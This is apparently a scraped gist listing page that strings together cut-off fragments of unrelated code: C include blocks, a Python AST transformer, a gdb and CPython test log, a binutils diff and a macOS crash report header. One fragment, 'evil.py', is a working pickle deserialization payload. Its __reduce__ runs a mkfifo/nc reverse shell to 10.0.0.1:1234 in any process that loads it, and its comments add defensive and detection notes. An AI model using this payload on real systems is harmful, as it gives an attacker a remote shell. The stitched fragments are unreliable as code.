
Pablo Galindo Salgado pablogsal

#include <elf.h>
#include <execinfo.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#define UNW_LOCAL_ONLY
#include <libunwind.h>
// AArch64 registers
#include <elf.h>
#include <execinfo.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
import ast
class ComparisonTransformer(ast.NodeTransformer):
def visit_Compare(self, node):
self.generic_visit(node)
if len(node.ops) == 1 and len(node.comparators) == 1:
return self.transform_single_comparison(node)
else:
Attaching and calling dlopen fails:
```
(gdb) call (void*)dlopen(0, 2) │>>> test test_exceptions failed -- Traceback (most recent call last):
Couldn't write extended state status: Bad address. │ File "/opt/_internal/cpython-3.8.13/lib/python3.8/test/test_exceptions.py", line 1256, in test_memory_error_in_PyErr_PrintEx
An error occurred while in a function called from GDB. │ rc, out, err = script_helper.assert_python_failure("-c", code % i)
Evaluation of the expression containing the function │ File "/opt/_internal/cpython-3.8.13/lib/python3.8/test/support/script_helper.py", line 167, in assert_python_failure
(dlopen@plt) will be abandoned.
#include <iostream>
#include <string>
#include <vector>
#include <stdexcept>
#include <elfutils/libdw.h>
#include <elfutils/libdwfl.h>
#include <dwarf.h>
#include <fcntl.h>
#include <unistd.h>
diff --git a/bfd/elf.c b/bfd/elf.c
index 84a5d94281..a0bd5203f5 100644
--- a/bfd/elf.c
+++ b/bfd/elf.c
@@ -5943,6 +5943,11 @@ assign_file_positions_for_load_sections (bfd *abfd,
link_info->callbacks->info ("%X");
}
+ /* If we have a PT_LOAD segment with no sections that is empty,
+ then we need to drop it or some loaders will complain. */
#include <fcntl.h>
#include <gelf.h>
#include <libelf.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
pablogsal / evil.py
Created October 23, 2023 08:46
evil.py
import pickle
import base64
import os
class Evil:
    """Object whose pickled form runs a shell command in whatever process loads it.

    pickle calls ``__reduce__`` when serializing and records the returned
    callable together with its argument tuple; the unpickler later calls that
    callable with those arguments. Nothing from this class needs to exist on
    the loading side, so any ``pickle.loads`` on bytes from an untrusted
    source amounts to code execution there.

    Defensive notes: ``pickletools.dis`` lists a stream's global reference
    and REDUCE opcode without executing it, and a ``pickle.Unpickler``
    subclass that overrides ``find_class`` with an allowlist rejects a
    reference to ``os.system`` before it is called.
    """

    def __reduce__(self):
        # Shell pipeline: recreates a FIFO at /tmp/f and connects an
        # interactive /bin/sh to nc at 10.0.0.1:1234 through it. Host-side
        # artifacts for detection are the /tmp/f FIFO and an `sh -i` process
        # paired with an outbound nc connection.
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f')
        # (callable, args) form: the unpickler invokes os.system(cmd) on load.
        # NOTE(review): the serialization step under `__main__` is cut off in
        # this listing, so how the payload is encoded is not shown here.
        return os.system, (cmd,)
if __name__ == '__main__':
Process: a.out [63465]
Path: /Users/USER/*/a.out
Load Address: 0x100000000
Identifier: a.out
Version: ???
Code Type: ARM64
Platform: macOS
Parent Process: debugserver [63466]
Date/Time: 2023-06-14 18:19:15.597 +0100